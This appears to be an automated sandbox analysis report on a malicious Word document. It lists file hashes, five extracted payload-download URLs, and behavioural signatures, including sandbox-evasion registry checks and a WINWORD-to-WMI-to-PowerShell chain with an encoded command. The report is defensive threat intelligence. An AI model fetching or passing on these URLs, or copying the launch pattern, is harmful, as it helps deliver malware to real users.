Analysis
- max time kernel: 147s
- max time network: 141s
- platform: windows10_x64
- resource: win10v200722
- submitted: 01-08-2020 19:37
Static task: static1
Behavioral task: behavioral1
- Sample: SecuriteInfo.com.Exploit.Siggen2.12174.29464.11497.doc
- Resource: win7
Behavioral task: behavioral2
- Sample: SecuriteInfo.com.Exploit.Siggen2.12174.29464.11497.doc
- Resource: win10v200722
General
- Target: SecuriteInfo.com.Exploit.Siggen2.12174.29464.11497.doc
- Size: 172KB
- MD5: 9c00d588f7b6a159c855b93627492516
- SHA1: fa1ed3fb2e4e6f7d8747584b8a1969e85daa4909
- SHA256: 061f4c387df2a0e388b644d647379077b84ea8a2a52eec31d3e2f95b0984be9f
- SHA512: 5da86f8939b379be6373a8f95d648c7a0046e0e1a5c102173cab90819c84f9abb10c2be5575e1df5c66348ace3e94926e5eee5638a71c98565be844ecc8bbe54
Malware Config
Extracted URLs:
- http://www.hatchdogs.com/assets/XIw/
- https://groovyboove.co.uk/blogs/8T94mmdka13/
- https://gregemerson.com/wp-includes/hudy17240/
- http://guariz.com.br/WuutjlO/
- http://hafder.com/images/fhq7h7babdbe5q5052/
Signatures
- Suspicious use of SetWindowsHookEx (11 IoCs)
  Processes (pid, process): 508 WINWORD.EXE, the same entry for all 11 IoCs
- Suspicious behavior: AddClipboardFormatListener (2 IoCs)
  Processes (pid, process): 508 WINWORD.EXE, the same entry for both IoCs
- Process spawned unexpected child process (1 IoC)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes (description, pid, pid_target, process, target process):
    Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process; 3580; 1144; powersheLL.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes (description, pid, process):
    Token: SeDebugPrivilege; 3580; powersheLL.exe
- Suspicious behavior: EnumeratesProcesses (3 IoCs)
  Processes (pid, process): 3580 powersheLL.exe, the same entry for all 3 IoCs
- Blacklisted process makes network request (3 IoCs)
  Processes (flow, pid, process):
    24; 3580; powersheLL.exe
    26; 3580; powersheLL.exe
    28; 3580; powersheLL.exe
- Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes (description, ioc, process):
    Key opened; \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0; WINWORD.EXE
    Key value queried; \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz; WINWORD.EXE
    Key value queried; \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString; WINWORD.EXE
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  Processes (description, ioc, process):
    Key opened; \REGISTRY\MACHINE\Hardware\Description\System\BIOS; WINWORD.EXE
    Key value queried; \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily; WINWORD.EXE
    Key value queried; \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU; WINWORD.EXE
Processes
- C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Exploit.Siggen2.12174.29464.11497.doc" /o ""
  - Suspicious use of SetWindowsHookEx
  - Suspicious behavior: AddClipboardFormatListener
  - Checks processor information in registry
  - Enumerates system info in registry
- C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
  Command line: powersheLL -e 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
  - Process spawned unexpected child process
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious behavior: EnumeratesProcesses
  - Blacklisted process makes network request